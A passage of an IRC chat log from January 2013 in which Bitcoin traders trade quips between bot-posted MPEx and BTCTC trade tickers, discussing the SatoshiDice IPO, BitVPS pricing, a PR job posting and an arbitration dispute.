everyone Jan 23 07:05:47 + all the girls. Jan 23 07:10:48 mircea_popescu: I love the girls too Jan 23 07:11:13 http://polimedia.us/dtng/c/src/135891785869.jpg speaking of which Jan 23 07:34:02 https://bitcointalk.org/index.php?topic=138100.0 is that you Ukto ? Jan 23 07:34:37 [MPEX] [S.MPOE] 4100 @ 0.00061195 = 2.509 BTC [-] Jan 23 07:36:21 [MPEX] [S.MPOE] 18414 @ 0.00061195 = 11.2684 BTC [-] Jan 23 07:36:23 [MPEX] [S.MPOE] 9595 @ 0.00061584 = 5.909 BTC [+] Jan 23 07:36:24 [MPEX] [S.MPOE] 991 @ 0.00061636 = 0.6108 BTC [+] Jan 23 07:37:25 In 2012, our users cashed out a total of 28,986฿. Jan 23 07:37:33 so bitzino made something like 300btc in 2012 ? Jan 23 07:44:25 [MPEX] [S.DICE] 636 @ 0.00513446 = 3.2655 BTC [-] Jan 23 07:51:01 [MPEX] [S.MPOE] 8423 @ 0.00060442 = 5.091 BTC [-] Jan 23 07:52:41 [MPEX] [S.MPOE] 8500 @ 0.00060309 = 5.1263 BTC [-] Jan 23 08:02:49 [MPEX] [S.MPOE] 4177 @ 0.00060424 = 2.5239 BTC [+] Jan 23 08:02:50 [MPEX] [S.MPOE] 7300 @ 0.00060843 = 4.4415 BTC [+] Jan 23 08:02:52 [MPEX] [S.MPOE] 1418 @ 0.00061636 = 0.874 BTC [+] Jan 23 08:06:30 [MPEX] [S.DICE] 1000 @ 0.00527971 = 5.2797 BTC [+] Jan 23 08:18:32 [MPEX] [S.DICE] 921 @ 0.00524349 = 4.8293 BTC [-] Jan 23 08:23:30 if anyone is looking for a job ---> http://trilema.com/2013/mpex-hiring-old-style-pr/ Jan 23 08:25:37 [MPEX] [S.MPOE] 6550 @ 0.00061954 = 4.058 BTC [+] Jan 23 08:30:55 [MPEX] [S.MPOE] 11800 @ 0.00061954 = 7.3106 BTC [+] Jan 23 08:32:35 [BTCTC] [COGNITIVE] 8 @ 0.3684 = 2.9472 BTC [-] Jan 23 08:32:37 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [-] Jan 23 08:58:55 I would take it, but I hardly post enough... Jan 23 08:59:47 I would do PR for asic companies Jan 23 09:02:32 post ?! Jan 23 09:02:38 there's no posting involved. Jan 23 09:03:20 I'm reading it now... I can see this Jan 23 09:03:57 [MPEX] [S.MPOE] 9058 @ 0.00061754 = 5.5937 BTC [-] Jan 23 09:04:26 by reading the link, I thought old style pr was something else. Jan 23 09:04:38 As in, more traditional. Jan 23 09:05:09 well yeah. Jan 23 09:05:17 that's what pr used to be, before sept 1991 Jan 23 09:05:41 As in, not wildly going around the forum like a rabid dog denigrating everything (regardless if deserved) and thus get visibility. Jan 23 09:06:27 heh who does that. Jan 23 09:06:39 MPOE-PR? Jan 23 09:07:16 Most of her post seems to be witch-hunting some random schmucks taking on a project too large for them and shooting them down. Jan 23 09:07:28 Or criticizing people or stuff. Jan 23 09:08:04 Well I guess on the visibility level, that does attract a lot of eyeballs. Jan 23 09:09:03 this != denigrating everything (regardless if deserved) Jan 23 09:09:22 neither as far as denigration goes, nor as far as deserved goes. Jan 23 09:09:54 Not what everyone seems to believes Jan 23 09:10:46 well, so give an example. Jan 23 09:10:49 She might often be right in her predictions. It's still shooting down stuff on assumptions. Jan 23 09:10:58 even her recent crusade against bfl (who aren't poor schmucks) seems to have been on the spot Jan 23 09:11:06 they didn't, in the end, deliver first. Jan 23 09:11:11 yeah Jan 23 09:11:19 But she can't always be right. Jan 23 09:11:25 well nobody can Jan 23 09:11:56 Yeah. But denigrating can mean simply attacking the reputation of someone or belittling them. She does that alot. Jan 23 09:12:29 Especially for some "developers" not fit for making the service they offer and etc. Jan 23 09:12:51 But she seems to be a quick shot. Jan 23 09:13:27 afaik truthfully denigrate is an oxymoron. Jan 23 09:14:22 Anyway, not what traditional PR account do. Jan 23 09:14:59 Those mostly answer questions, talk about the merits of the business and mostly doesn't care about whatever drama or stuff happening around them. Jan 23 09:16:09 actually, what pr does is get press mentions. Jan 23 09:16:19 the rest is fluff. Jan 23 09:16:23 Normally. Jan 23 09:16:51 I just didn't get that from just reading the words from the link. Jan 23 09:17:10 Going to be hard to get mentionned in major news outlets. Jan 23 09:17:24 But feasible along some other bitcoin news. Jan 23 09:17:42 They talked of BFL, they talked of SilkRoad, they talked of BitPay Jan 23 09:17:48 I don't see why not MPEx Jan 23 09:19:16 Anyway. Got to go back to updating stuff for BitVPS Jan 23 09:19:18 later Jan 23 09:19:21 gl. Jan 23 09:21:39 [MPEX] [S.MPOE] 12450 @ 0.00061754 = 7.6884 BTC [-] Jan 23 09:27:02 [MPEX] [S.MPOE] 10150 @ 0.00061851 = 6.2779 BTC [+] Jan 23 09:30:49 [MPEX] [S.MPOE] 9183 @ 0.00061754 = 5.6709 BTC [-] Jan 23 09:30:50 [MPEX] [S.MPOE] 4467 @ 0.00061323 = 2.7393 BTC [-] Jan 23 09:51:05 [MPEX] [S.MPOE] 4500 @ 0.00061323 = 2.7595 BTC [-] Jan 23 09:52:50 [MPEX] [S.MPOE] 3133 @ 0.00061323 = 1.9212 BTC [-] Jan 23 09:52:53 [MPEX] [S.MPOE] 12617 @ 0.0006093 = 7.6875 BTC [-] Jan 23 09:58:16 [MPEX] [S.MPOE] 2312 @ 0.00061607 = 1.4244 BTC [+] Jan 23 09:58:19 [MPEX] [S.MPOE] 307 @ 0.00061851 = 0.1899 BTC [+] Jan 23 10:05:51 [MPEX] [S.MPOE] 5033 @ 0.0006093 = 3.0666 BTC [-] Jan 23 10:05:52 [MPEX] [S.MPOE] 4367 @ 0.00060856 = 2.6576 BTC [-] Jan 23 10:10:59 [MPEX] [S.MPOE] 7543 @ 0.00061851 = 4.6654 BTC [+] Jan 23 10:11:01 [MPEX] [S.MPOE] 2830 @ 0.00061874 = 1.751 BTC [+] Jan 23 10:50:31 [MPEX] [S.MPOE] 25300 @ 0.00061855 = 15.6493 BTC [-] Jan 23 10:50:33 [MPEX] [S.MPOE] 300 @ 0.00061034 = 0.1831 BTC [-] Jan 23 10:59:46 [MPEX] [S.MPOE] 15874 @ 0.00061034 = 9.6885 BTC [-] Jan 23 10:59:48 [MPEX] [S.MPOE] 14026 @ 0.00060856 = 8.5357 BTC [-] Jan 23 11:10:57 [MPEX] [S.MPOE] 7670 @ 0.00060856 = 4.6677 BTC [-] Jan 23 11:10:58 [MPEX] [S.MPOE] 7371 @ 0.00060823 = 4.4833 BTC [-] Jan 23 11:28:23 [MPEX] [S.DICE] 843 @ 0.00524349 = 4.4203 BTC [-] Jan 23 11:28:26 [MPEX] [S.DICE] 300 @ 0.00513129 = 1.5394 BTC [-] Jan 23 11:28:28 [MPEX] [S.DICE] 1457 @ 0.0051312 = 7.4762 BTC [-] Jan 23 11:32:49 [MPEX] [S.MPOE] 2929 @ 0.00060823 = 1.7815 BTC [-] Jan 23 11:32:55 [MPEX] [S.MPOE] 5250 @ 0.00060684 = 3.1859 BTC [-] Jan 23 11:36:07 [MPEX] [S.MPOE] 22943 @ 0.00060474 = 13.8745 BTC [-] Jan 23 11:40:41 [MPEX] [S.MPOE] 3188 @ 0.00060309 = 1.9227 BTC [-] Jan 23 11:40:43 [MPEX] [S.MPOE] 13212 @ 0.00060288 = 7.9653 BTC [-] Jan 23 11:42:05 [MPEX] [S.MPOE] 20600 @ 0.00060288 = 12.4193 BTC [-] Jan 23 11:53:12 [MPEX] [S.MPOE] 3188 @ 0.00060288 = 1.922 BTC [-] Jan 23 11:53:14 [MPEX] [S.MPOE] 1912 @ 0.00060278 = 1.1525 BTC [-] Jan 23 12:00:40 [MPEX] [S.MPOE] 23708 @ 0.00060278 = 14.2907 BTC [-] Jan 23 12:00:42 [MPEX] [S.MPOE] 7250 @ 0.00060262 = 4.369 BTC [-] Jan 23 12:00:42 [MPEX] [S.MPOE] 16375 @ 0.00060224 = 9.8617 BTC [-] Jan 23 12:00:45 [MPEX] [S.MPOE] 22767 @ 0.00060224 = 13.7112 BTC [-] Jan 23 12:10:58 [MPEX] [S.MPOE] 11697 @ 0.00060474 = 7.0736 BTC [+] Jan 23 12:14:19 [MPEX] [S.MPOE] 10481 @ 0.00060474 = 6.3383 BTC [+] Jan 23 12:14:20 [MPEX] [S.MPOE] 12130 @ 0.00060902 = 7.3874 BTC [+] Jan 23 12:51:31 [MPEX] [S.MPOE] 8600 @ 0.00060057 = 5.1649 BTC [-] Jan 23 12:58:59 [MPEX] [S.MPOE] 15100 @ 0.00060648 = 9.1578 BTC [+] Jan 23 12:59:00 [MPEX] [S.MPOE] 6000 @ 0.00060902 = 3.6541 BTC [+] Jan 23 13:03:38 [MPEX] [S.MPOE] 11000 @ 0.00060902 = 6.6992 BTC [+] Jan 23 13:21:32 [MPEX] [S.MPOE] 1153 @ 0.00060057 = 0.6925 BTC [-] Jan 23 13:21:34 [MPEX] [S.MPOE] 16700 @ 0.00060042 = 10.027 BTC [-] Jan 23 13:21:35 [MPEX] [S.MPOE] 19147 @ 0.00059937 = 11.4761 BTC [-] Jan 23 13:23:06 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.01310272 = 13.1027 BTC [-] Jan 23 13:37:02 mornin Jan 23 13:44:39 hey jurov Jan 23 13:44:55 Just done fixing BitVPS billing... well most of it... still working on that Jan 23 13:45:26 hey... so... you misbilled me or? Jan 23 13:46:02 No, but it concerns you and everyone Jan 23 13:46:18 Basically, there's no way to automatically update the price for everyone. Jan 23 13:46:40 and all price are based on fixed USD Jan 23 13:46:58 So we're switching everyone to USD pricing. Jan 23 13:47:37 i herd they are moving to btct Jan 23 13:47:39 That way, everyone always pays the exact price based on MtGox Jan 23 13:47:47 Yes, we chose BTCT.co Jan 23 13:48:20 heh, good luck with burnside. Jan 23 13:48:57 ? Jan 23 13:49:17 thanks Jan 23 13:49:27 i just have some own experience with him Jan 23 13:49:39 [MPEX] [S.DICE] 2644 @ 0.00525465 = 13.8933 BTC [+] Jan 23 13:49:41 [MPEX] [S.DICE] 3164 @ 0.00527971 = 16.705 BTC [+] Jan 23 13:49:42 [MPEX] [S.DICE] 2000 @ 0.00532851 = 10.657 BTC [+] Jan 23 13:49:44 "I work in fraud investigation and forensic accounting. People bring me crazy stories all the time. One such story was from a contractor who was hired to put in ventilation to a building for a bunch of servers. The owner later bragged about how he was stealing/counter fitting bitcoins and selling them. I have no idea how this all works but my advice is the same as Wulfar's, stay away from it" Jan 23 13:49:48 [MPEX] [S.DICE] 900 @ 0.00536067 = 4.8246 BTC [+] Jan 23 13:49:50 [MPEX] [S.DICE] 300 @ 0.0053929 = 1.6179 BTC [+] Jan 23 13:49:51 [MPEX] [S.DICE] 6000 @ 0.00539293 = 32.3576 BTC [+] Jan 23 13:49:52 people. srsly fucken retarded. Jan 23 13:49:53 [MPEX] [S.DICE] 377 @ 0.00541028 = 2.0397 BTC [+] Jan 23 13:49:53 [MPEX] [S.DICE] 5060 @ 0.00579999 = 29.3479 BTC [+] Jan 23 13:49:55 [MPEX] [S.DICE] 10000 @ 0.00579999 = 57.9999 BTC [+] Jan 23 13:49:55 [MPEX] [S.DICE] 10000 @ 0.0058 = 58 BTC [+] Jan 23 13:49:56 [MPEX] [S.DICE] 4900 @ 0.0059 = 28.91 BTC [+] Jan 23 13:49:57 [MPEX] [S.DICE] 1000 @ 0.00595622 = 5.9562 BTC [+] Jan 23 13:49:58 [MPEX] [S.DICE] 8651 @ 0.00599 = 51.8195 BTC [+] Jan 23 13:50:17 (sauce http://forum.wurmonline.com/index.php?/topic/61424-bitcoin-mining-for-silvers/ _ Jan 23 13:51:02 jurov seems to indicate he has some bad experience with burnside Jan 23 13:52:27 not really bad... just annoying stuff on teh forums, got called borderline scammer Jan 23 13:53:14 without real reason, he did not even try coinbr afaik Jan 23 13:53:32 oh... Jan 23 13:54:01 Ukto had it similar. So i avoid btct and ltccc Jan 23 13:56:19 ic. some fleas think they are dogs Jan 23 13:57:14 ok, that's a good line right there. Jan 23 13:57:17 ima steal it. Jan 23 14:10:12 https://bitcointalk.org/index.php?topic=101902.msg1117186#msg1117186 Jan 23 14:10:19 im kinda sad nobody lent him stock to short at 32 Jan 23 14:10:52 [MPEX] [S.MPOE] 7000 @ 0.00059938 = 4.1957 BTC [+] Jan 23 14:13:58 [MPEX] [S.MPOE] 1000 @ 0.00059938 = 0.5994 BTC [+] Jan 23 14:14:00 [MPEX] [S.MPOE] 11300 @ 0.00059937 = 6.7729 BTC [-] Jan 23 14:19:43 Re: customer deposts: I can't give you guys coins that I don't have, but I will likely be paying users out of pocket for this in a manner that is affordable. The way the site was set up before, apparently, advertisers were not allowed to withdrawal at all. I want to change things like this to allow that sort of functionality but I am not going to be able to do that especially if you guys try to all withdrawal at once Jan 23 14:19:43 , it's just not going to be feasible, and if giantdragon still had the site, apparently, he wouldn't have paid advertiser balances out anyway. Advertisers would use their balances for advertising, and the publishers had the ability to be paid out. If a publisher has a balance and the amount requested for withdrawal is reasonable, I'll just pay it out of pocket, but it's not like I have a massive bitcoin balance to be Jan 23 14:19:43 paying out of. I have a very little amount of bitcoin, and after buying coinurl the amount is laughable but if the total amount of publisher withdrawals is a few BTC a week or something then I can make that happen. Be reasonable, be patient, and this transition will be pretty seamless. Jan 23 14:19:47 this is pretty great. Jan 23 14:30:41 thestringpuller you gotta read this : https://bitcointalk.org/index.php?topic=137084.msg1465225#msg1465225 Jan 23 14:30:44 part after last quote Jan 23 14:38:21 [MPEX] [S.MPOE] 13020 @ 0.00060902 = 7.9294 BTC [+] Jan 23 14:38:23 [MPEX] [S.MPOE] 8000 @ 0.00061221 = 4.8977 BTC [+] Jan 23 14:38:24 [MPEX] [S.MPOE] 6380 @ 0.00061306 = 3.9113 BTC [+] Jan 23 14:46:28 [MPEX] [S.MPOE] 6732 @ 0.00061306 = 4.1271 BTC [+] Jan 23 14:49:07 [MPEX] [S.MPOE] 11644 @ 0.00060252 = 7.0157 BTC [-] Jan 23 14:51:35 nice, 100btc was too steep for me atm Jan 23 14:53:05 S.DICE going up up uo Jan 23 14:53:39 over 100k bet in the last 17 hours Jan 23 14:54:08 dice up about 10k for the month I think Jan 23 14:54:08 and still going? Jan 23 14:54:08 including the latest Jan 23 14:54:37 yeah the last burst of 4,000 bet was 8 minutes ago Jan 23 14:54:43 haven't included it yet actually :) Jan 23 14:54:47 freakin whales Jan 23 14:56:54 [MPEX] [S.MPOE] 4250 @ 0.00061306 = 2.6055 BTC [+] Jan 23 14:57:24 +9200 on >115,000 bet Jan 23 14:57:37 roughly Jan 23 14:58:08 !ticker m s.dice Jan 23 14:58:08 [MPEX:S.DICE] 1D: 0.0051312 / 0.00543782 / 0.00599 (145859 shares, 793.16 BTC), 7D: 0.00454703 / 0.00511 / 0.00599 (711971 shares, 3,638.17 BTC), 30D: 0.00343244 / 0.00417666 / 0.00599 (9620260 shares, 40,180.62 BTC) Jan 23 14:58:36 Good, good Jan 23 14:58:51 I'll keep updated with dooglus next update Jan 23 15:16:55 makomk malaimo markedathome maximian midnightmagic mircea_popescu mod6 Jan 23 15:17:02 thestringpuller was 50 in the end they say Jan 23 15:19:59 Actually... they lose 1.9%, of which a good part goes to shareholders... Jan 23 15:20:30 gains from what? Jan 23 15:23:25 But IPO is already finished... Jan 23 15:23:44 10 million shares sold, all that was issued on MPEx... Jan 23 15:23:45 [MPEX] [S.MPOE] 18056 @ 0.00060252 = 10.8791 BTC [-] Jan 23 15:23:46 [MPEX] [S.MPOE] 16185 @ 0.00059937 = 9.7008 BTC [-] Jan 23 15:24:24 Ok, he made a lot of money on the IPO. Jan 23 15:24:31 [MPEX] [O.BTCUSD.C140T] 620 @ 0.18660466 = 115.6949 BTC [+] Jan 23 15:25:13 I don't see why it would go on. Still people betting large sums Jan 23 15:25:25 Why would evoorhee be betting now? Jan 23 15:25:30 Earlier, maybe. Jan 23 15:25:45 Yeah, but 90% is not issued on MPEx Jan 23 15:26:04 Maybe... Jan 23 15:26:12 We'll see Jan 23 15:26:32 I wouldn't have IPOed Jan 23 15:26:43 Would have kept 100% of SatoshiDice Jan 23 15:28:26 Not 6 years earnings. Jan 23 15:29:41 Even if he sold at 0.004, that's only 40000 BTC for the 10 million shares. Jan 23 15:30:53 That's 2-3 year earnings if we keep getting 1000 BTC+ per month in dividends Jan 23 15:31:12 Namworld that's a problem, really. pretty much nobody wants to list for that reason Jan 23 15:31:18 (+ not having to deal with idiots) Jan 23 15:31:23 Assuming betting doesn't stop. Jan 23 15:32:04 I issued loan bonds. I pay 10.95% per year on BTC debt. People still loan me funds. Jan 23 15:32:20 Best deal an issuer can get. Jan 23 15:32:25 [MPEX] [S.MPOE] 28562 @ 0.00059937 = 17.1192 BTC [-] Jan 23 15:32:28 [MPEX] [S.MPOE] 471 @ 0.00059928 = 0.2823 BTC [-] Jan 23 15:32:28 [MPEX] [S.MPOE] 11467 @ 0.00059858 = 6.8639 BTC [-] Jan 23 15:33:01 Yeah, I suppose. Jan 23 15:33:24 Still... I think it was a bad deal for evoorhees to IPO Jan 23 15:34:14 ... find me one godlike stock which gains 100% in 2-3 years... Jan 23 15:34:39 He did not... but he lose longterm. Jan 23 15:34:57 Assuming all betting is real Jan 23 15:35:10 He'd get more long term just keeping 100% Jan 23 15:35:25 http://investmentwatchblog.com/wtf-facebook-wants-a-photo-id-now/ kinda funnay Jan 23 15:35:50 If it does, than yeah Jan 23 15:36:09 I'd be surprised SatoshiDice would get closed/outranked. Jan 23 15:37:15 rofl http://youtu.be/e2HwRM9eBCs?t=34m28s Jan 23 15:37:16 Well I try to avoid such drama. Jan 23 15:37:41 Actually I don't even really try. My threads tend to be dramaless. Jan 23 15:37:52 They're almost ghost towns. Jan 23 15:38:10 It's almost just me posting updates every month or two Jan 23 15:39:05 Yeah Jan 23 15:39:13 Well 40000BTC is a neat cushion Jan 23 15:40:08 Well I didn't do it... and in that case, it financed rg's business actually, funds were needed. Jan 23 15:40:26 Plus I wouldn't have bought shares or known rg at all without the IPO. Jan 23 15:40:50 [MPEX] [S.BBET] 250 @ 0.001139 = 0.2848 BTC [+] Jan 23 15:41:01 Which means rg wouldn't have invited me to take over BitVPS with arij and phungus Jan 23 15:41:27 So I suppose I don't regret the IPO. Jan 23 15:41:33 [MPEX] [S.MPOE] 18393 @ 0.00061283 = 11.2718 BTC [+] Jan 23 15:42:03 Well for SatoshiDice, the coins were not needed. Jan 23 15:42:19 I'd have taken the risk and just get all for myself. Jan 23 15:42:53 If my business ends up earning nothing, well so be it... Jan 23 15:44:16 Either some shareholders lose, or I lose... Jan 23 15:44:39 I'd chose all the risks, all the rewards Jan 23 15:45:10 Ah, well anyway. Jan 23 15:45:28 I hope so. Jan 23 15:45:31 [MPEX] [S.DICE] 500 @ 0.00598998 = 2.995 BTC [-] Jan 23 15:45:32 [MPEX] [S.DICE] 1000 @ 0.00598999 = 5.99 BTC [+] Jan 23 15:45:33 [MPEX] [S.DICE] 800 @ 0.00599 = 4.792 BTC [+] Jan 23 15:45:39 He already got a massive earning BTC business Jan 23 15:46:21 Well SD... Jan 23 15:46:48 So I'd have put the coins on some stock of fiat stock exchange. Jan 23 15:47:34 Get a little edge Jan 23 15:47:57 Anyway, 8:47 am... I need sleep. Jan 23 15:48:28 Was up all night working on BitVPS Jan 23 15:51:41 [MPEX] [S.BBET] 350 @ 0.001139 = 0.3987 BTC [+] Jan 23 15:53:16 [MPEX] [S.MPOE] 1833 @ 0.00059858 = 1.0972 BTC [-] Jan 23 16:03:09 Namworld, if you ran sdice privately, how would you cover 2k loss like one in november? Jan 23 16:03:35 you can get 2k just by issuing bonds? Jan 23 16:03:48 or you'd have to lower the bet limit considerably Jan 23 16:05:41 [MPEX] [S.DICE] 549 @ 0.00599 = 3.2885 BTC [+] Jan 23 16:05:42 [MPEX] [S.DICE] 1800 @ 0.00599355 = 10.7884 BTC [+] Jan 23 16:07:02 [MPEX] [S.MPOE] 13633 @ 0.00059657 = 8.133 BTC [-] Jan 23 16:07:03 [MPEX] [S.MPOE] 27800 @ 0.00059617 = 16.5735 BTC [-] Jan 23 16:07:05 [MPEX] [S.MPOE] 8785 @ 0.00059592 = 5.2352 BTC [-] Jan 23 16:07:07 [MPEX] [S.BBET] 300 @ 0.001139 = 0.3417 BTC [+] Jan 23 16:15:00 [MPEX] [S.MPOE] 9350 @ 0.00059673 = 5.5794 BTC [+] Jan 23 16:19:25 [MPEX] [S.MPOE] 20215 @ 0.00059592 = 12.0465 BTC [-] Jan 23 16:19:27 [MPEX] [S.MPOE] 8802 @ 0.00059485 = 5.2359 BTC [-] Jan 23 16:19:27 [MPEX] [S.MPOE] 833 @ 0.00059445 = 0.4952 BTC [-] Jan 23 16:31:53 wow money is being taken out of mpex and placed into s.dice Jan 23 16:31:57 mpoe* Jan 23 16:36:59 or s.bbet... and coinbr users match each other's orders, causing new bugs to pop up Jan 23 16:37:44 doh, making my own exchange would be easier than this Jan 23 16:38:04 where is our api lol Jan 23 16:38:50 BBET is more profitable to run bets on as a business than investing in the stock Jan 23 16:41:30 [MPEX] [S.MPOE] 7600 @ 0.00059673 = 4.5351 BTC [+] Jan 23 16:43:27 I wish you could p2p sue someone. Jan 23 16:46:34 move le money! Jan 23 16:50:24 well you can use the rota but even if you pay the judges and neg rate them for ruling you should return someone else's funds you may still lose Jan 23 17:02:32 [MPEX] [S.MPOE] 2717 @ 0.00059673 = 1.6213 BTC [+] Jan 23 17:05:01 hello Jan 23 17:05:37 fuck all the nonsense Jan 23 17:05:48 the rota was used improperly for a moral judgement Jan 23 17:06:01 it's mircea_popescu discretion toreturn funds Jan 23 17:06:20 the blockchain predetermined it. he asked the rota to make a moral decision Jan 23 17:07:06 jcpham, can't get over it? Jan 23 17:07:18 lol i told mircea maybe first rota case will be about "mpoe-pr is public nuisance" cause it falls into its scope Jan 23 17:07:25 was not so far from truth Jan 23 17:07:30 the choices were a) yes return the money b) no do not Jan 23 17:07:38 but what happened was door number three Jan 23 17:07:50 [MPEX] [S.DICE] 2500 @ 0.00614098 = 15.3525 BTC [+] Jan 23 17:07:53 and behind door number three are 3 strangers making moral decisions Jan 23 17:08:35 let's be clear: the blockchain is in fact permanent imho Jan 23 17:08:47 it isn't decision to reverse blockchain transactions Jan 23 17:09:21 the person who....requested all of this.....either directly or indirectly....and their reaction Jan 23 17:09:41 twas directly Jan 23 17:09:53 indecision is the lack of action Jan 23 17:10:17 mircea_popescu directly told wences to use the rota instead of settling it Jan 23 17:10:27 EskimoBob_afk: correct Jan 23 17:11:06 i'm not upset. i just think it should be made the clear the rota shouldn't be deciding moral debates about customer service Jan 23 17:12:14 [MPEX] [S.MPOE] 2634 @ 0.00061283 = 1.6142 BTC [+] Jan 23 17:12:16 actually that was a common legal issue and it is ALWAYS resolved that no matter the afreement if you can fix a problem like that easily you are required Jan 23 17:13:11 EskimoBob_afk i think you may be a larger fanboi than me Jan 23 17:13:19 Boomshakalak Jan 23 17:13:23 ;) Jan 23 17:13:45 i don't play well with others Jan 23 17:22:37 EskimoBob_afk is clearly a liar. Jan 23 17:23:35 Unless he now types using psychokinesis Jan 23 17:24:08 look it's an imsaguy Jan 23 17:32:38 [MPEX] [S.MPOE] 21200 @ 0.00061092 = 12.9515 BTC [-] Jan 23 17:32:40 [MPEX] [S.MPOE] 6855 @ 0.00060879 = 4.1733 BTC [-] Jan 23 17:36:54 [MPEX] [S.MPOE] 31700 @ 0.00060444 = 19.1607 BTC [-] Jan 23 17:41:56 [MPEX] [S.MPOE] 5049 @ 0.00060444 = 3.0518 BTC [-] Jan 23 17:41:58 [MPEX] [S.MPOE] 5323 @ 0.00061283 = 3.2621 BTC [+] Jan 23 17:41:59 [MPEX] [S.MPOE] 9428 @ 0.00061306 = 5.7799 BTC [+] Jan 23 17:44:52 [BTCTC] [GSDPT] 10 @ 0.0059 = 0.059 BTC [+] Jan 23 17:54:53 ;;ticker Jan 23 17:54:54 BTCUSD ticker | Best bid: 17.30000, Best ask: 17.30077, Bid-ask spread: 0.00077, Last trade: 17.30000, 24 hour volume: 54870.17966918, 24 hour low: 16.80155, 24 hour high: 17.58890, 24 hour vwap: 17.21227 Jan 23 17:54:55 boom Jan 23 17:55:05 17.25 and 17.30 walls just got bot Jan 23 18:00:29 ill bot your walls Jan 23 18:03:45 [MPEX] [S.MPOE] 15309 @ 0.00060438 = 9.2525 BTC [-] Jan 23 18:11:49 [MPEX] [S.MPOE] 6900 @ 0.00060438 = 4.1702 BTC [-] Jan 23 18:23:04 ;;ticker Jan 23 18:23:06 BTCUSD ticker | Best bid: 17.29900, Best ask: 17.34999, Bid-ask spread: 0.05099, Last trade: 17.29900, 24 hour volume: 54137.88100753, 24 hour low: 16.80155, 24 hour high: 17.58890, 24 hour vwap: 17.21015 Jan 23 18:29:08 [MPEX] [S.DICE] 851 @ 0.00600303 = 5.1086 BTC [-] Jan 23 18:29:09 [MPEX] [S.DICE] 349 @ 0.00595519 = 2.0784 BTC [-] Jan 23 18:29:21 !ticke S.MPOE Jan 23 18:29:24 !ticker S.MPOE Jan 23 18:29:25 Shit. You ain't even old enough to smoke. Jan 23 18:29:30 !ticker m S.MPOE Jan 23 18:29:31 [MPEX:S.MPOE] 1D: 0.00059445 / 0.00060973 / 0.00062988 (2042391 shares, 1,245.32 BTC), 7D: 0.00059445 / 0.00063728 / 0.00068 (12240334 shares, 7,800.57 BTC), 30D: 0.00059445 / 0.00064382 / 0.00068 (39855484 shares, 25,659.87 BTC) Jan 23 18:29:42 neither are you assbot Jan 23 18:30:04 assbot smokes teh cok since he was six months old. Jan 23 18:31:25 What's the guy who runs bitvps' name? Jan 23 18:32:01 there's 3 now. namworld you mean ? Jan 23 18:38:10 [BTCTC] [RSM] 14 @ 0.0089 = 0.1246 BTC [+] Jan 23 18:38:11 [BTCTC] [RSM] 59 @ 0.0089 = 0.5251 BTC [+] Jan 23 18:40:36 [BTCTC] [RSM] 38 @ 0.009 = 0.342 BTC [+] Jan 23 18:43:02 ;;later tell Namworld I need an emergency VPS, possible NS hosting/transfer Jan 23 18:43:03 The operation succeeded. Jan 23 18:45:33 [MPEX] [S.MPOE] 4650 @ 0.00060433 = 2.8101 BTC [-] Jan 23 18:47:05 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.30282548 = 302.8255 BTC [+] Jan 23 18:47:07 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.36117336 = 361.1734 BTC [+] Jan 23 18:47:13 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.24447761 = 244.4776 BTC [+] Jan 23 18:54:44 ;;ticker Jan 23 18:54:45 BTCUSD ticker | Best bid: 17.40102, Best ask: 17.47277, Bid-ask spread: 0.07175, Last trade: 17.40102, 24 hour volume: 53901.83917218, 24 hour low: 16.80155, 24 hour high: 17.58890, 24 hour vwap: 17.20956 Jan 23 18:55:40 [MPEX] [S.MPOE] 8791 @ 0.00060438 = 5.3131 BTC [+] Jan 23 18:55:42 [MPEX] [S.MPOE] 18350 @ 0.00060884 = 11.1722 BTC [+] Jan 23 18:55:46 [MPEX] [S.MPOE] 29600 @ 0.00061236 = 18.1259 BTC [+] Jan 23 18:55:48 [MPEX] [S.MPOE] 1160 @ 0.00061306 = 0.7111 BTC [+] Jan 23 18:55:49 [MPEX] [S.MPOE] 1699 @ 0.00061405 = 1.0433 BTC [+] Jan 23 19:01:07 [HAVELOCK] [SDICE] 1 @ 0.533 BTC [+] Jan 23 19:02:39 [MPEX] [S.DICE] 1300 @ 0.00614 = 7.982 BTC [+] Jan 23 19:18:03 ;;seen smickles Jan 23 19:18:03 smickles was last seen in #bitcoin-assets 1 day, 1 hour, 14 minutes, and 54 seconds ago: what was the final precursor last time? a bunch of puts bought, calls sold? Jan 23 19:18:10 smickles: around? Jan 23 19:18:18 no Jan 23 19:18:27 bad internet Jan 23 19:18:39 btw Jan 23 19:18:48 did you really want me to play through to disc 2 on ff7? :/ Jan 23 19:18:59 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.30241793 = 302.4179 BTC [-] Jan 23 19:19:00 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.24403609 = 244.0361 BTC [-] Jan 23 19:19:02 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.36079977 = 360.7998 BTC [-] Jan 23 19:19:04 no. just send it to me duuuh Jan 23 19:19:13 i pay btc mr. 2 copies Jan 23 19:19:14 I am seriously ocncerned about the scratces tho Jan 23 19:19:40 you want 2 copies? Jan 23 19:19:50 i have a disc 2 i only technically need disc 2 Jan 23 19:19:58 0,o Jan 23 19:19:59 err disc 1 Jan 23 19:20:02 oh Jan 23 19:21:58 http://i.imgur.com/0Um67nJ.png Jan 23 19:22:05 hm, this looks distinctly bullish Jan 23 19:22:32 it will be difficult to stop for sure Jan 23 19:22:51 if people keep sending coins to gox to sell, that is Jan 23 19:23:21 seems therre's 3x as much fiat as coins Jan 23 19:23:30 yeah Jan 23 19:23:46 what would be even more interesting is if the asks got even shallower Jan 23 19:24:06 nad gox starts to dry up Jan 23 19:24:16 it prolly will Jan 23 19:24:24 what people don't realise is that btc is a lot like s.dice Jan 23 19:24:25 it seems close Jan 23 19:24:31 fixed pool available, buy it out it's out. Jan 23 19:24:55 the bulls have taken over gox Jan 23 19:24:58 that is certain Jan 23 19:24:59 thats any stock... Jan 23 19:25:48 thestringpuller anything wioth fixed supply. people think btc "is money" thus fully inflationary bs fiat. Jan 23 19:25:51 it's not. Jan 23 19:26:21 mircea_popescu: those people need to watch the introductory video Jan 23 19:27:19 there's levels. on some intellectual level they get it Jan 23 19:27:26 but on the gut level they still think "money" = fiat Jan 23 19:27:36 gold is like that in physical reality... Jan 23 19:27:49 gold is as old as the earth so it seems Jan 23 19:28:01 well no, gold is much older than earth. Jan 23 19:28:13 [MPEX] [S.MPOE] 8550 @ 